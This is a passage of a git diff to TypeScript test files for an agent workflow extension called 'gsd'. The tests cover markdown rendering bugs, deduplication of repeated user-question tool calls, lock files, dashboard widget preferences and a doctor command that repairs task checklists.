+
+This is why.
+
+## Architectural Decisions
+
+### Decision 1
+
+**Decision:** Use TypeScript
+
+## Acceptance Criteria
+
+- Criterion 1
+`;
+
+    const result = validateEnhancedContext(contentWithDecisionsInMiddle);
+    assert.equal(result.valid, true, "should validate content with decisions in middle");
+  });
+
+  test("detects missing decision entry when section is empty", () => {
+    const contentEmptyDecisions = `
+# M001: Test Milestone
+
+## Why This Milestone
+
+This is why.
+
+## Architectural Decisions
+
+(No decisions yet)
+
+## Acceptance Criteria
+
+- Criterion 1
+`;
+
+    const result = validateEnhancedContext(contentEmptyDecisions);
+    assert.equal(result.valid, false, "should fail when decisions section has no entries");
+    assert.ok(
+      result.missing.some((m) => m.includes("decision entry")),
+      "should report missing decision entry",
+    );
+  });
+
+  test("accepts inline **Decision format", () => {
+    const contentInlineDecision = `
+## Why This Milestone
+
+Test
+
+## Architectural Decisions
+
+**Decision:** Use React
+
+## Acceptance Criteria
+
+- Criterion 1
+`;
+
+    const result = validateEnhancedContext(contentInlineDecision);
+    assert.equal(result.valid, true, "should accept **Decision format");
+  });
+
+  test("accepts ### subsection format", () => {
+    const contentSubsectionDecision = `
+## Why This Milestone
+
+Test
+
+## Architectural Decisions
+
+### Database Choice
+
+We chose SQLite.
+
+## Acceptance Criteria
+
+- Criterion 1
+`;
+
+    const result = validateEnhancedContext(contentSubsectionDecision);
+    assert.equal(result.valid, true, "should accept ### subsection format");
+  });
+
+  test("handles edge case: Architectural Decisions heading without space before content", () => {
+    const contentNoSpace = `## Why This Milestone
+Test
+## Architectural Decisions
+### Decision 1
+Content here
+## Acceptance Criteria
+- Done`;
+
+    const result = validateEnhancedContext(contentNoSpace);
+    assert.equal(result.valid, true, "should handle content without extra spacing");
+  });
+});
+
+// ─── Fix 3: Consecutive error counter (agent-loop.ts) ────────────────────────────
+
+describe("Fix #3 — Consecutive error counter (UPSTREAM)", () => {
+  test("NOTE: agent-loop.ts is upstream code that was not modified", () => {
+    // This finding from the adversarial review relates to upstream behavior
+    // in packages/pi-agent-core/src/agent-loop.ts.
+    //
+    // The consecutiveAllToolErrorTurns counter logic was added in PR #3301
+    // and refined in PR #3618 by upstream contributors. These PRs fix
+    // issues with:
+    // - Schema overload detection counting bash exit codes as failures
+    // - The counter not resetting properly on successful turns
+    //
+    // Since this is upstream code (part of pi-agent-core, not gsd extension),
+    // we do not modify it here. The fix should be coordinated with upstream.
+    //
+    // See: packages/pi-agent-core/src/agent-loop.ts lines 191, 298-325
+    assert.ok(true, "Documented as upstream behavior — no changes made");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/agent-end-retry.test.ts b/src/resources/extensions/gsd/tests/agent-end-retry.test.ts
index 6db2f9d36..955fabf5a 100644
--- a/src/resources/extensions/gsd/tests/agent-end-retry.test.ts
+++ b/src/resources/extensions/gsd/tests/agent-end-retry.test.ts
@@ -102,7 +102,7 @@ test("pauseAuto calls resolveAgentEndCancelled to unblock the loop", () => {
   const fnBlock = source.slice(fnIdx, source.indexOf("\n/**\n * Build", fnIdx + 100));
 
   assert.ok(
-    fnBlock.includes("resolveAgentEndCancelled()"),
+    fnBlock.includes("resolveAgentEndCancelled("),
     "pauseAuto must call resolveAgentEndCancelled to unblock the auto-loop promise",
   );
 });
@@ -116,7 +116,7 @@ test("auto-timers.ts idle watchdog catch calls resolveAgentEndCancelled", () =>
   // Check that resolveAgentEndCancelled is called near this catch
   const catchRegion = source.slice(Math.max(0, idleCatchIdx - 200), idleCatchIdx + 200);
   assert.ok(
-    catchRegion.includes("resolveAgentEndCancelled()"),
+    catchRegion.includes("resolveAgentEndCancelled("),
     "idle watchdog catch block must call resolveAgentEndCancelled",
   );
 });
@@ -129,7 +129,7 @@ test("auto-timers.ts hard timeout catch calls resolveAgentEndCancelled", () => {
   assert.ok(hardCatchIdx > -1, "hard timeout catch block must exist");
   const catchRegion = source.slice(Math.max(0, hardCatchIdx - 200), hardCatchIdx + 200);
   assert.ok(
-    catchRegion.includes("resolveAgentEndCancelled()"),
+    catchRegion.includes("resolveAgentEndCancelled("),
     "hard timeout catch block must call resolveAgentEndCancelled",
   );
 });
diff --git a/src/resources/extensions/gsd/tests/artifact-corruption-2630.test.ts b/src/resources/extensions/gsd/tests/artifact-corruption-2630.test.ts
new file mode 100644
index 000000000..a35691602
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/artifact-corruption-2630.test.ts
@@ -0,0 +1,288 @@
+// GSD — regression tests for issue #2630
+// Milestone/slice artifact rendering must not corrupt existing markdown.
+// Three bugs: (A) milestone title double-prefix, (B) full_uat_md demo fallback,
+// (C) STATE.md title double-prefix.
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+
+import {
+  renderPlanContent,
+  renderRoadmapContent,
+  renderStateContent,
+} from '../workflow-projections.ts';
+import type { SliceRow, TaskRow, MilestoneRow } from '../gsd-db.ts';
+import type { GSDState } from '../types.ts';
+
+// ─── Helpers ─────────────────────────────────────────────────────────────
+
+function makeSliceRow(overrides?: Partial<SliceRow>): SliceRow {
+  return {
+    milestone_id: 'M001',
+    id: 'S04',
+    title: 'Dependency-driven scene pipeline and state truth',
+    status: 'complete',
+    risk: 'high',
+    depends: ['S03'],
+    demo: '',
+    created_at: '2026-01-01T00:00:00Z',
+    completed_at: '2026-01-15T00:00:00Z',
+    full_summary_md: '',
+    full_uat_md: `# S04: Dependency-driven scene pipeline and state truth — UAT
+
+**Milestone:** M001
+**Written:** 2026-01-15
+
+## UAT Type: Functional
+
+### Scenario 1: Pipeline processes dependencies
+**Given** a scene with dependencies
+**When** the pipeline runs
+**Then** dependencies are resolved in order`,
+    goal: 'Build dependency-driven scene pipeline',
+    success_criteria: '',
+    proof_level: '',
+    integration_closure: '',
+    observability_impact: '',
+    sequence: 4,
+    replan_triggered_at: null,
+    ...overrides,
+  };
+}
+
+function makeTaskRow(overrides?: Partial<TaskRow>): TaskRow {
+  return {
+    milestone_id: 'M001',
+    slice_id: 'S04',
+    id: 'T01',
+    title: 'Test Task',
+    status: 'done',
+    one_liner: '',
+    narrative: '',
+    verification_result: '',
+    duration: '',
+    completed_at: null,
+    blocker_discovered: false,
+    deviations: '',
+    known_issues: '',
+    key_files: [],
+    key_decisions: [],
+    full_summary_md: '',
+    full_plan_md: '',
+    description: 'Test description',
+    estimate: '30m',
+    files: [],
+    verify: 'npm test',
+    inputs: [],
+    expected_output: [],
+    observability_impact: '',
+    sequence: 0,
+    ...overrides,
+  };
+}
+
+function makeMilestoneRow(overrides?: Partial<MilestoneRow>): MilestoneRow {
+  return {
+    id: 'M001',
+    title: 'Topic-to-pipeline foundation',
+    status: 'active',
+    depends_on: [],
+    created_at: '2026-01-01T00:00:00Z',
+    completed_at: null,
+    vision: 'Build the topic-to-pipeline foundation',
+    success_criteria: [],
+    key_risks: [],
+    proof_strategy: [],
+    verification_contract: '',
+    verification_integration: '',
+    verification_operational: '',
+    verification_uat: '',
+    definition_of_done: [],
+    requirement_coverage: '',
+    boundary_map_markdown: '',
+    ...overrides,
+  };
+}
+
+function makeGSDState(overrides?: Partial<GSDState>): GSDState {
+  return {
+    activeMilestone: { id: 'M001', title: 'Topic-to-pipeline foundation' },
+    activeSlice: { id: 'S01', title: 'Auth Layer' },
+    activeTask: null,
+    phase: 'executing',
+    recentDecisions: [],
+    blockers: [],
+    nextAction: 'Continue execution',
+    registry: [],
+    requirements: undefined,
+    ...overrides,
+  };
+}
+
+// ─── Bug A: milestone title double-prefix ────────────────────────────────
+// When params.title already contains "M001: ", the H1 should NOT become
+// "# M001: M001: Topic-to-pipeline foundation"
+
+test('#2630 renderRoadmapContent: milestone title with pre-existing ID prefix renders without duplication', () => {
+  const milestone = makeMilestoneRow({ title: 'M001: Topic-to-pipeline foundation' });
+  const content = renderRoadmapContent(milestone, []);
+
+  // The H1 must be exactly "# M001: Topic-to-pipeline foundation", not "# M001: M001: ..."
+  assert.ok(
+    content.includes('# M001: Topic-to-pipeline foundation'),
+    `expected single prefix in H1, got: ${content.split('\n')[0]}`,
+  );
+  assert.ok(
+    !content.includes('M001: M001:'),
+    `found double prefix in roadmap H1: ${content.split('\n')[0]}`,
+  );
+});
+
+test('#2630 renderStateContent: active milestone title with pre-existing ID prefix renders without duplication', () => {
+  const state = makeGSDState({
+    activeMilestone: { id: 'M001', title: 'M001: Topic-to-pipeline foundation' },
+  });
+  const content = renderStateContent(state);
+
+  assert.ok(
+    !content.includes('M001: M001:'),
+    `found double prefix in STATE.md: ${content}`,
+  );
+  assert.ok(
+    content.includes('**Active Milestone:** M001: Topic-to-pipeline foundation'),
+    `expected single prefix, got: ${content}`,
+  );
+});
+
+test('#2630 renderStateContent: registry entry with pre-existing ID prefix renders without duplication', () => {
+  const state = makeGSDState({
+    registry: [
+      { id: 'M001', title: 'M001: Topic-to-pipeline foundation', status: 'active' },
+    ],
+  });
+  const content = renderStateContent(state);
+
+  assert.ok(
+    !content.includes('M001: M001:'),
+    `found double prefix in registry: ${content}`,
+  );
+});
+
+// ─── Bug D: PLAN.md slice title double-prefix ──────────────────────────────
+// When sliceRow.title already contains "S04: ", the H1 should NOT become
+// "# S04: S04: Dependency-driven scene pipeline and state truth"
+
+test('#2630 renderPlanContent: slice title with pre-existing ID prefix renders without duplication', () => {
+  const slice = makeSliceRow({ title: 'S04: Dependency-driven scene pipeline and state truth' });
+  const content = renderPlanContent(slice, []);
+
+  // The H1 must be exactly "# S04: Dependency-driven scene pipeline and state truth"
+  assert.ok(
+    content.includes('# S04: Dependency-driven scene pipeline and state truth'),
+    `expected single prefix in H1, got: ${content.split('\n')[0]}`,
+  );
+  assert.ok(
+    !content.includes('S04: S04:'),
+    `found double prefix in PLAN.md H1: ${content.split('\n')[0]}`,
+  );
+});
+
+test('#2630 renderPlanContent: slice title without prefix still renders correctly', () => {
+  const slice = makeSliceRow({ title: 'Dependency-driven scene pipeline and state truth' });
+  const content = renderPlanContent(slice, []);
+
+  assert.ok(
+    content.startsWith('# S04: Dependency-driven scene pipeline and state truth'),
+    `expected prefixed H1, got: ${content.split('\n')[0]}`,
+  );
+});
+
+// ─── Bug B: full_uat_md as demo fallback ─────────────────────────────────
+// When slice.demo is empty and full_uat_md is a multi-line UAT document,
+// the renderers must NOT inject the entire UAT body.
+
+test('#2630 renderPlanContent: empty demo must not inject full_uat_md body into plan', () => {
+  const slice = makeSliceRow({ demo: '' });
+  const content = renderPlanContent(slice, []);
+
+  // The **Demo:** line must be a single line, not multi-line UAT content
+  const demoLine = content.split('\n').find(l => l.startsWith('**Demo:**'));
+  assert.ok(demoLine, 'should have a Demo line');
+
+  // Must not contain UAT headings or body
+  assert.ok(
+    !content.includes('## UAT Type'),
+    `plan contains UAT body content: ${content}`,
+  );
+  assert.ok(
+    !content.includes('**Milestone:** M001'),
+    `plan contains UAT metadata: ${content}`,
+  );
+
+  // The Demo line must not contain newlines (single line only)
+  assert.ok(
+    !demoLine!.includes('\n'),
+    `Demo line must be single line, got: ${demoLine}`,
+  );
+});
+
+test('#2630 renderPlanContent: null demo must not inject full_uat_md body into plan', () => {
+  const slice = makeSliceRow({ demo: null as unknown as string });
+  const content = renderPlanContent(slice, []);
+
+  assert.ok(
+    !content.includes('## UAT Type'),
+    `plan contains UAT body content when demo is null`,
+  );
+});
+
+test('#2630 renderRoadmapContent: empty demo must not inject full_uat_md into roadmap table', () => {
+  const milestone = makeMilestoneRow();
+  const slices = [makeSliceRow({ demo: '' })];
+
+  const content = renderRoadmapContent(milestone, slices);
+
+  // Roadmap table cell for "After this" must be single-line
+  assert.ok(
+    !content.includes('## UAT Type'),
+    `roadmap contains UAT body content: ${content}`,
+  );
+  assert.ok(
+    !content.includes('**Milestone:** M001'),
+    `roadmap contains UAT metadata: ${content}`,
+  );
+
+  // The table row containing S04 must be a single line
+  const s04Line = content.split('\n').find(l => l.includes('| S04 |'));
+  assert.ok(s04Line, 'should have S04 table row');
+  assert.ok(
+    !s04Line!.includes('# S04:'),
+    `roadmap table cell contains UAT heading: ${s04Line}`,
+  );
+});
+
+test('#2630 renderRoadmapContent: null demo must not inject full_uat_md into roadmap table', () => {
+  const milestone = makeMilestoneRow();
+  const slices = [makeSliceRow({ demo: null as unknown as string })];
+
+  const content = renderRoadmapContent(milestone, slices);
+
+  assert.ok(
+    !content.includes('## UAT Type'),
+    `roadmap contains UAT body content when demo is null`,
+  );
+});
+
+test('#2630 renderPlanContent: with valid demo string does not use full_uat_md', () => {
+  const slice = makeSliceRow({ demo: 'Login flow works end-to-end' });
+  const content = renderPlanContent(slice, []);
+
+  assert.ok(
+    content.includes('**Demo:** After this: Login flow works end-to-end'),
+    `expected demo text, got: ${content}`,
+  );
+  assert.ok(
+    !content.includes('UAT'),
+    `should not contain UAT when demo is provided`,
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/ask-user-questions-dedup.test.ts b/src/resources/extensions/gsd/tests/ask-user-questions-dedup.test.ts
new file mode 100644
index 000000000..40276f33c
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/ask-user-questions-dedup.test.ts
@@ -0,0 +1,120 @@
+// ask-user-questions-dedup — Regression tests for per-turn deduplication
+//
+// Verifies that duplicate ask_user_questions calls within a single turn
+// return cached results instead of re-dispatching (especially to remote
+// channels like Discord). Also verifies the strict loop guard threshold
+// for interactive tools.
+//
+// Regression: duplicate questions were sent to Discord when the LLM called
+// ask_user_questions multiple times with the same question set in one turn,
+// causing user confusion and tool failure cascading to plain text fallback.
+
+import { describe, test, beforeEach } from "node:test";
+import assert from "node:assert/strict";
+import {
+  checkToolCallLoop,
+  resetToolCallLoopGuard,
+} from "../bootstrap/tool-call-loop-guard.ts";
+import {
+  resetAskUserQuestionsCache,
+  questionSignature,
+} from "../../ask-user-questions.ts";
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Strict loop guard: ask_user_questions blocks on 2nd identical call
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe("ask_user_questions dedup", () => {
+  beforeEach(() => {
+    resetToolCallLoopGuard();
+    resetAskUserQuestionsCache();
+  });
+
+  test("loop guard blocks 2nd identical ask_user_questions call", () => {
+    const args = { questions: [{ id: "app_coverage", question: "Which apps?" }] };
+
+    const first = checkToolCallLoop("ask_user_questions", args);
+    assert.equal(first.block, false, "First call should be allowed");
+
+    const second = checkToolCallLoop("ask_user_questions", args);
+    assert.equal(second.block, true, "2nd identical call should be blocked");
+    assert.ok(second.reason!.includes("ask_user_questions"), "Reason should name the tool");
+  });
+
+  test("loop guard allows different ask_user_questions calls", () => {
+    const args1 = { questions: [{ id: "app_coverage", question: "Which apps?" }] };
+    const args2 = { questions: [{ id: "testing_focus", question: "What priority?" }] };
+
+    const first = checkToolCallLoop("ask_user_questions", args1);
+    assert.equal(first.block, false, "First call allowed");
+
+    const second = checkToolCallLoop("ask_user_questions", args2);
+    assert.equal(second.block, false, "Different question set should be allowed");
+  });
+
+  test("non-interactive tools still use normal threshold of 4", () => {
+    const args = { query: "same query" };
+
+    for (let i = 1; i <= 4; i++) {
+      const result = checkToolCallLoop("web_search", args);
+      assert.equal(result.block, false, `web_search call ${i} should be allowed`);
+    }
+
+    const fifth = checkToolCallLoop("web_search", args);
+    assert.equal(fifth.block, true, "5th identical web_search should be blocked");
+  });
+
+  test("cache resets independently from loop guard", () => {
+    // Verify the reset function exists and is callable
+    resetAskUserQuestionsCache();
+    // No error means the cache module is properly exported and functional
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // questionSignature: full-payload hashing prevents stale cache hits
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  test("same IDs with different question text produce different signatures", () => {
+    const q1 = [{ id: "scope", header: "Scope", question: "Which apps to cover?",
+      options: [{ label: "All", description: "Everything" }] }];
+    const q2 = [{ id: "scope", header: "Scope", question: "Which services to test?",
+      options: [{ label: "All", description: "Everything" }] }];
+
+    assert.notEqual(questionSignature(q1), questionSignature(q2),
+      "Different question text with same ID must produce different signatures");
+  });
+
+  test("same IDs with different options produce different signatures", () => {
+    const q1 = [{ id: "scope", header: "Scope", question: "Pick one",
+      options: [{ label: "A", description: "Option A" }] }];
+    const q2 = [{ id: "scope", header: "Scope", question: "Pick one",
+      options: [{ label: "B", description: "Option B" }] }];
+
+    assert.notEqual(questionSignature(q1), questionSignature(q2),
+      "Different options with same ID must produce different signatures");
+  });
+
+  test("identical payloads in different order produce same signature", () => {
+    const q1 = [
+      { id: "b", header: "B", question: "Q2", options: [{ label: "X", description: "x" }] },
+      { id: "a", header: "A", question: "Q1", options: [{ label: "Y", description: "y" }] },
+    ];
+    const q2 = [
+      { id: "a", header: "A", question: "Q1", options: [{ label: "Y", description: "y" }] },
+      { id: "b", header: "B", question: "Q2", options: [{ label: "X", description: "x" }] },
+    ];
+
+    assert.equal(questionSignature(q1), questionSignature(q2),
+      "Same questions in different order must produce the same signature");
+  });
+
+  test("allowMultiple difference produces different signature", () => {
+    const q1 = [{ id: "scope", header: "Scope", question: "Pick",
+      options: [{ label: "A", description: "a" }], allowMultiple: false }];
+    const q2 = [{ id: "scope", header: "Scope", question: "Pick",
+      options: [{ label: "A", description: "a" }], allowMultiple: true }];
+
+    assert.notEqual(questionSignature(q1), questionSignature(q2),
+      "allowMultiple difference must produce different signatures");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/atomic-task-closeout.test.ts b/src/resources/extensions/gsd/tests/atomic-task-closeout.test.ts
deleted file mode 100644
index fab33427e..000000000
--- a/src/resources/extensions/gsd/tests/atomic-task-closeout.test.ts
+++ /dev/null
@@ -1,184 +0,0 @@
-/**
- * Tests for atomic task closeout (#1650):
- * 1. Doctor unmarks task checkbox when summary is missing (instead of creating stub)
- * 2. markTaskUndoneInPlan correctly unchecks a task in the slice plan
- */
-
-import { mkdirSync, writeFileSync, readFileSync, rmSync, existsSync } from "node:fs";
-import { join } from "node:path";
-import { tmpdir } from "node:os";
-import test from "node:test";
-import assert from "node:assert/strict";
-import { runGSDDoctor } from "../doctor.ts";
-import { markTaskUndoneInPlan } from "../roadmap-mutations.ts";
-
-function makeTmp(name: string): string {
-  const dir = join(tmpdir(), `atomic-closeout-${name}-${Date.now()}-${Math.random().toString(36).slice(2)}`);
-  mkdirSync(dir, { recursive: true });
-  return dir;
-}
-
-// ── markTaskUndoneInPlan ─────────────────────────────────────────────────────
-
-test("markTaskUndoneInPlan unchecks a checked task", () => {
-  const base = makeTmp("uncheck");
-  const planPath = join(base, "PLAN.md");
-  writeFileSync(planPath, `# S01: Demo
-
-## Tasks
-
-- [x] **T01: First task** \`est:5m\`
-- [ ] **T02: Second task** \`est:10m\`
-`);
-
-  const changed = markTaskUndoneInPlan(base, planPath, "T01");
-  assert.ok(changed, "should return true when plan was modified");
-
-  const content = readFileSync(planPath, "utf-8");
-  assert.ok(content.includes("- [ ] **T01:"), "T01 should be unchecked");
-  assert.ok(content.includes("- [ ] **T02:"), "T02 should remain unchecked");
-
-  rmSync(base, { recursive: true, force: true });
-});
-
-test("markTaskUndoneInPlan is idempotent on already-unchecked task", () => {
-  const base = makeTmp("uncheck-noop");
-  const planPath = join(base, "PLAN.md");
-  writeFileSync(planPath, `# S01: Demo
-
-## Tasks
-
-- [ ] **T01: First task** \`est:5m\`
-`);
-
-  const changed = markTaskUndoneInPlan(base, planPath, "T01");
-  assert.ok(!changed, "should return false when no change needed");
-
-  rmSync(base, { recursive: true, force: true });
-});
-
-test("markTaskUndoneInPlan handles indented checkboxes", () => {
-  const base = makeTmp("uncheck-indent");
-  const planPath = join(base, "PLAN.md");
-  writeFileSync(planPath, `# S01: Demo
-
-## Tasks
-
-  - [x] **T01: First task** \`est:5m\`
-`);
-
-  const changed = markTaskUndoneInPlan(base, planPath, "T01");
-  assert.ok(changed, "should handle indented checkboxes");
-
-  const content = readFileSync(planPath, "utf-8");
-  assert.ok(content.includes("[ ] **T01:"), "T01 should be unchecked");
-
-  rmSync(base, { recursive: true, force: true });
-});
-
-// ── Doctor: task_done_missing_summary unchecks instead of stubbing ────────────
-
-test("doctor unchecks task when checkbox is marked but summary is missing", async () => {
-  const base = makeTmp("doctor-uncheck");
-  const gsd = join(base, ".gsd");
-  const m = join(gsd, "milestones", "M001");
-  const s = join(m, "slices", "S01");
-  const t = join(s, "tasks");
-  mkdirSync(t, { recursive: true });
-
-  writeFileSync(join(m, "M001-ROADMAP.md"), `# M001: Test
-
-## Slices
-
-- [ ] **S01: Test Slice** \`risk:low\` \`depends:[]\`
-  > Demo
-`);
-
-  // Task is marked [x] in plan but has no summary file
-  writeFileSync(join(s, "S01-PLAN.md"), `# S01: Test Slice
-
-**Goal:** test
-
-## Tasks
-
-- [x] **T01: Do stuff** \`est:5m\`
-- [ ] **T02: Other stuff** \`est:5m\`
-`);
-
-  // T02 has no summary either, but it's unchecked — should be left alone
-
-  // Run doctor in diagnose mode first
-  const diagnoseReport = await runGSDDoctor(base, { fix: false });
-  const issue = diagnoseReport.issues.find(i => i.code === "task_done_missing_summary");
-  assert.ok(issue, "should detect task_done_missing_summary");
-  assert.equal(issue!.severity, "error");
-
-  // Run doctor in fix mode
-  const fixReport = await runGSDDoctor(base, { fix: true });
-  const fixApplied = fixReport.fixesApplied.some(f => f.includes("unchecked T01"));
-  assert.ok(fixApplied, "should have unchecked T01 in the fix log");
-
-  // Verify the plan now has T01 unchecked
-  const planContent = readFileSync(join(s, "S01-PLAN.md"), "utf-8");
-  assert.ok(planContent.includes("- [ ] **T01:"), "T01 should be unchecked after doctor fix");
-  assert.ok(planContent.includes("- [ ] **T02:"), "T02 should remain unchecked");
-
-  // Verify no stub summary was created
-  const stubPath = join(t, "T01-SUMMARY.md");
-  assert.ok(
-    !existsSync(stubPath),
-    "should NOT create a stub summary — task should re-execute instead",
-  );
-
-  rmSync(base, { recursive: true, force: true });
-});
-
-test("doctor does not touch task with checkbox AND summary both present", async () => {
-  const base = makeTmp("doctor-ok");
-  const gsd = join(base, ".gsd");
-  const m = join(gsd, "milestones", "M001");
-  const s = join(m, "slices", "S01");
-  const t = join(s, "tasks");
-  mkdirSync(t, { recursive: true });
-
-  writeFileSync(join(m, "M001-ROADMAP.md"), `# M001: Test
-
-## Slices
-
-- [ ] **S01: Test Slice** \`risk:low\` \`depends:[]\`
-  > Demo
-`);
-
-  writeFileSync(join(s, "S01-PLAN.md"), `# S01: Test Slice
-
-**Goal:** test
-
-## Tasks
-
-- [x] **T01: Do stuff** \`est:5m\`
-`);
-
-  writeFileSync(join(t, "T01-SUMMARY.md"), `---
-id: T01
-parent: S01
-milestone: M001
-duration: 5m
-verification_result: passed
-completed_at: 2026-01-01
----
-
-# T01: Do stuff
-
-Done.
-`);
-
-  const report = await runGSDDoctor(base, { fix: true });
-  const hasTaskIssue = report.issues.some(i => i.code === "task_done_missing_summary");
-  assert.ok(!hasTaskIssue, "should not flag task_done_missing_summary when both exist");
-
-  // Plan should still have T01 checked
-  const planContent = readFileSync(join(s, "S01-PLAN.md"), "utf-8");
-  assert.ok(planContent.includes("- [x] **T01:"), "T01 should remain checked");
-
-  rmSync(base, { recursive: true, force: true });
-});
diff --git a/src/resources/extensions/gsd/tests/auto-dashboard.test.ts b/src/resources/extensions/gsd/tests/auto-dashboard.test.ts
index 4ca0836f9..13ef53a6c 100644
--- a/src/resources/extensions/gsd/tests/auto-dashboard.test.ts
+++ b/src/resources/extensions/gsd/tests/auto-dashboard.test.ts
@@ -1,5 +1,8 @@
 import test from "node:test";
 import assert from "node:assert/strict";
+import { mkdirSync, readFileSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
 
 import {
   unitVerb,
@@ -9,8 +12,29 @@ import {
   formatWidgetTokens,
   estimateTimeRemaining,
   extractUatSliceId,
+  getWidgetMode,
+  cycleWidgetMode,
+  _resetWidgetModeForTests,
 } from "../auto-dashboard.ts";
 
+const autoSource = readFileSync(join(process.cwd(), "src", "resources", "extensions", "gsd", "auto.ts"), "utf-8");
+const dashboardSource = readFileSync(join(process.cwd(), "src", "resources", "extensions", "gsd", "auto-dashboard.ts"), "utf-8");
+
+function makeTempDir(prefix: string): string {
+  return join(
+    tmpdir(),
+    `gsd-auto-dashboard-test-${prefix}-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+  );
+}
+
+function cleanup(dir: string): void {
+  try {
+    rmSync(dir, { recursive: true, force: true });
+  } catch {
+    // best-effort
+  }
+}
+
 // ─── unitVerb ─────────────────────────────────────────────────────────────
 
 test("unitVerb maps known unit types to verbs", () => {
@@ -180,6 +204,17 @@ test("formatAutoElapsed returns empty string for negative autoStartTime", () =>
   assert.equal(formatAutoElapsed(NaN), "");
 });
 
+test("getAutoDashboardData returns RTK savings in the dashboard payload", () => {
+  assert.match(autoSource, /const rtkSavings = sessionId && s\.basePath/);
+  assert.match(autoSource, /rtkSavings,/);
+});
+
+test("auto progress widget renders RTK savings under the footer stats line", () => {
+  assert.match(dashboardSource, /formatRtkSavingsLabel/);
+  assert.match(dashboardSource, /getRtkSessionSavings\(accessors\.getBasePath\(\), sessionId\)/);
+  assert.match(dashboardSource, /lines\.push\(rightAlign\("", theme\.fg\("dim", cachedRtkLabel\), width\)\);/);
+});
+
 // ─── extractUatSliceId ───────────────────────────────────────────────────
 
 test("extractUatSliceId extracts slice ID from M001/S01 format", () => {
@@ -193,3 +228,35 @@ test("extractUatSliceId returns null for invalid formats", () => {
   assert.equal(extractUatSliceId(""), null);
   assert.equal(extractUatSliceId("M001/T01"), null);
 });
+
+test("widget mode respects project preference precedence and persists there", (t) => {
+  const homeDir = makeTempDir("home");
+  const projectDir = makeTempDir("project");
+  const globalPrefsPath = join(homeDir, ".gsd", "preferences.md");
+  const projectPrefsPath = join(projectDir, ".gsd", "preferences.md");
+
+  mkdirSync(join(homeDir, ".gsd"), { recursive: true });
+  mkdirSync(join(projectDir, ".gsd"), { recursive: true });
+  writeFileSync(globalPrefsPath, "---\nversion: 1\nwidget_mode: off\n---\n", "utf-8");
+  writeFileSync(projectPrefsPath, "---\nversion: 1\nwidget_mode: small\n---\n", "utf-8");
+
+  t.after(() => {
+    cleanup(homeDir);
+    cleanup(projectDir);
+    _resetWidgetModeForTests();
+  });
+
+  _resetWidgetModeForTests();
+
+  assert.equal(getWidgetMode(projectPrefsPath, globalPrefsPath), "small", "project widget_mode overrides global");
+  assert.equal(
+    cycleWidgetMode(projectPrefsPath, globalPrefsPath),
+    "min",
+    "cycling advances from the project-owned mode",
+  );
+
+  const projectPrefs = readFileSync(projectPrefsPath, "utf-8");
+  const globalPrefs = readFileSync(globalPrefsPath, "utf-8");
+  assert.match(projectPrefs, /widget_mode:\s*min/);
+  assert.match(globalPrefs, /widget_mode:\s*off/);
+});
diff --git a/src/resources/extensions/gsd/tests/auto-lock-creation.test.ts b/src/resources/extensions/gsd/tests/auto-lock-creation.test.ts
index e18bc2b6b..0ff8d963e 100644
--- a/src/resources/extensions/gsd/tests/auto-lock-creation.test.ts
+++ b/src/resources/extensions/gsd/tests/auto-lock-creation.test.ts
@@ -27,7 +27,7 @@ test("writeLock creates auto.lock with correct structure", () => {
   const dir = mkdtempSync(join(tmpdir(), "gsd-lock-test-"));
   mkdirSync(join(dir, ".gsd"), { recursive: true });
 
-  writeLock(dir, "starting", "M001", 0);
+  writeLock(dir, "starting", "M001");
 
   const lockPath = join(dir, ".gsd", "auto.lock");
   assert.ok(existsSync(lockPath), "auto.lock should exist after writeLock");
@@ -36,7 +36,6 @@ test("writeLock creates auto.lock with correct structure", () => {
   assert.equal(data.pid, process.pid, "lock should contain current PID");
   assert.equal(data.unitType, "starting", "lock should contain unit type");
   assert.equal(data.unitId, "M001", "lock should contain unit ID");
-  assert.equal(data.completedUnits, 0, "lock should show 0 completed units");
   assert.ok(data.startedAt, "lock should have startedAt timestamp");
 
   rmSync(dir, { recursive: true, force: true });
@@ -46,13 +45,12 @@ test("writeLock updates existing lock with new unit info", () => {
   const dir = mkdtempSync(join(tmpdir(), "gsd-lock-test-"));
   mkdirSync(join(dir, ".gsd"), { recursive: true });
 
-  writeLock(dir, "starting", "M001", 0);
-  writeLock(dir, "execute-task", "M001/S01/T01", 2, "/tmp/session.jsonl");
+  writeLock(dir, "starting", "M001");
+  writeLock(dir, "execute-task", "M001/S01/T01", "/tmp/session.jsonl");
 
   const data = JSON.parse(readFileSync(join(dir, ".gsd", "auto.lock"), "utf-8"));
   assert.equal(data.unitType, "execute-task", "lock should be updated to new unit type");
   assert.equal(data.unitId, "M001/S01/T01", "lock should be updated to new unit ID");
-  assert.equal(data.completedUnits, 2, "completed count should be updated");
   assert.equal(data.sessionFile, "/tmp/session.jsonl", "session file should be recorded");
 
   rmSync(dir, { recursive: true, force: true });
@@ -74,13 +72,12 @@ test("readCrashLock returns lock data when file exists", () => {
   const dir = mkdtempSync(join(tmpdir(), "gsd-lock-test-"));
   mkdirSync(join(dir, ".gsd"), { recursive: true });
 
-  writeLock(dir, "plan-milestone", "M002", 5);
+  writeLock(dir, "plan-milestone", "M002");
   const lock = readCrashLock(dir);
 
   assert.ok(lock, "should return lock data");
   assert.equal(lock!.unitType, "plan-milestone");
   assert.equal(lock!.unitId, "M002");
-  assert.equal(lock!.completedUnits, 5);
 
   rmSync(dir, { recursive: true, force: true });
 });
@@ -91,7 +88,7 @@ test("clearLock removes the lock file", () => {
   const dir = mkdtempSync(join(tmpdir(), "gsd-lock-test-"));
   mkdirSync(join(dir, ".gsd"), { recursive: true });
 
-  writeLock(dir, "starting", "M001", 0);
+  writeLock(dir, "starting", "M001");
   assert.ok(existsSync(join(dir, ".gsd", "auto.lock")), "lock should exist before clear");
 
   clearLock(dir);
@@ -110,26 +107,24 @@ test("clearLock is safe when no lock file exists", () => {
   rmSync(dir, { recursive: true, force: true });
 });
 
